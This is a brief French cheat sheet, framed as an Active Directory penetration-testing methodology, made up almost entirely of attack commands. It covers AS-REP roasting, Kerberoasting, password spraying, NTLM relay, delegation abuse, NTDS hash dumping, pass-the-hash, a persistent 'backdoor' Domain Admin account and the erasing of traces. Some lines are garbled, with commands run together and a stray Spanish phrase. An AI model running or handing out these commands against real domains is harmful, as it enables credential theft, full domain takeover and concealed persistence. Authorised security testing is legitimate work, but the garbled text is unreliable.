Méthodologie complète pour tester la sécurité d'un domaine Active Directory.
Identifier le domaine, les serveurs, les utilisateurs et la structure du réseau.
nmap -sV -p 389,3268 targetenum4linux -u "" -N targetObtenir des credentials valides dans le domaine.
# AS-REP Roasting
impacket-GetNPUsers domain.com/ -usersfile users.txt
# Kerberoasting
impacket-GetUserSPNs domain.com/user:password -request
# Spray identifiants
crackmapexec smb targets.txt -u users.txt -p passwords.txt
Identifier les chemins d'attaque et les relations de confiance dans AD.
SharpHound.exe -c AllEscalader desde user faible vers Domain Admin / Entreprise Admin.
# Ajouter un utilisateur à un groupe (via ACL)
net group "Domain Admins" user /add /domain
# Relayer vers LDAP (impacket)
impacket-ntlmrelayx -t ldap://dc.domain.com --escalate-user attacker
# Exploiter délégation non contrainte
impacket-getST domain.com/machine$:password -impersonate Administrator
Maintenir l'accès et documenter la compromission.
# Dumper NTDS
impacket-secretsdump -ntds ntds.dit -sam sam REGISTRY/SYSTEM
# Pass-the-Hash
impacket-psexec -hashes :hash domain.com/user@target
# Créer user persistant
net user backdoor password /add /domain
net group "Domain Admins" backdoor /add /domain
Effacer les traces et livrer un rapport complet.
| Phase | Outils | Commandes clés |
|---|---|---|
| Reconnaissance | nmap, enum4linux, GetADUsers | nmap -sV -p 389, enum4linux -u "" |
| Authentification | impacket, crackmapexec, hashcat | GetNPUsers, GetUserSPNs, spray |
| Énumération | SharpHound, BloodHound, ldapsearch | SharpHound -c All, ldapsearch |
| Escalade | Rubeus, PowerShell AD, ntlmrelayx | ntlmrelayx, S4U2self, S4U2proxy |
| Post-Exploitation | Mimikatz, secretsdump, psexec | secretsdump, Pass-the-Hash, Pass-the-Ticket |